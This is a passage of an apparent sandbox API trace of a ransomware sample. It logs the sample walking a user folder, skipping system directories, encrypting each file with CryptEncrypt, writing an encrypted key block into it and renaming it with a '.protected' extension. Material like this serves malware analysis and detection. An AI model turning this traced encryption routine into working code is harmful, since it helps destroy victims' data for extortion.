lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x100, lpOverlapped=0x0) returned 1 [0089.007] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.007] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x100, lpOverlapped=0x0) returned 1 [0089.008] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.008] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.008] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 
[0089.008] CloseHandle (hObject=0x150) returned 1 [0089.008] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.protected") returned 129 [0089.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21.protected")) returned 1 [0089.009] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Windows") returned -1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Program Files") returned -1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Program Files (x86)") returned -1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="$Recycle.bin") returned 1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="System Volume Information") returned -1 [0089.009] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0089.009] StrStrIW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".protected") returned 0x0 [0089.009] lstrcmpW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="RESTORE_FILES.txt") returned -1 [0089.009] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.009] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0089.010] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".txt") returned 0x0 [0089.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0089.010] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".rar") returned 0x0 [0089.010] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0089.010] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".zip") returned 0x0 [0089.010] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1b2, lpOverlapped=0x0) returned 1 [0089.011] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.011] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1b2, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1b2, lpOverlapped=0x0) returned 1 [0089.011] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.011] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.011] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.011] CloseHandle (hObject=0x150) returned 1 [0089.012] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.protected") returned 162 [0089.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.protected")) returned 1 [0089.013] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Windows") returned -1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files") returned -1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files (x86)") returned -1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="$Recycle.bin") returned 1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="System Volume Information") returned -1 [0089.013] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0089.013] StrStrIW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".protected") returned 0x0 [0089.013] lstrcmpW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="RESTORE_FILES.txt") returned -1 [0089.013] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.013] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0089.013] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0089.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0089.014] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".rar") returned 0x0 [0089.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0089.014] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".zip") returned 0x0 [0089.014] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xdc, lpOverlapped=0x0) returned 1 [0089.014] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.014] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xdc, 
lpOverlapped=0x0) returned 1 [0089.015] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.015] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.015] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.015] CloseHandle (hObject=0x150) returned 1 [0089.015] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected") returned 129 [0089.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.protected")) returned 1 [0089.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Windows") returned -1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Program Files") returned -1 [0089.016] lstrcmpiW 
(lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Program Files (x86)") returned -1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="$Recycle.bin") returned 1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="System Volume Information") returned -1 [0089.016] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0089.016] StrStrIW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".protected") returned 0x0 [0089.016] lstrcmpW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="RESTORE_FILES.txt") returned -1 [0089.016] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.016] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.017] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0089.017] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".txt") returned 0x0 [0089.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0089.018] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".rar") returned 0x0 [0089.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0089.018] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".zip") returned 0x0 [0089.018] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.018] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.019] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.019] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.019] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.019] WriteFile (in: hFile=0x150, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.019] CloseHandle (hObject=0x150) returned 1 [0089.019] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.protected") returned 162 [0089.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.protected")) returned 1 [0089.020] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Windows") returned -1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Program Files") returned -1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Program Files (x86)") returned -1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="$Recycle.bin") returned 1 [0089.020] lstrcmpiW 
(lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="System Volume Information") returned -1 [0089.020] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0089.020] StrStrIW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".protected") returned 0x0 [0089.020] lstrcmpW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="RESTORE_FILES.txt") returned -1 [0089.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.021] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0089.021] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".txt") returned 0x0 [0089.021] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0089.021] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".rar") returned 0x0 [0089.021] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0089.021] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".zip") returned 0x0 [0089.021] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.022] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.022] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.022] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.022] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.022] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.022] CloseHandle (hObject=0x150) returned 1 [0089.023] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
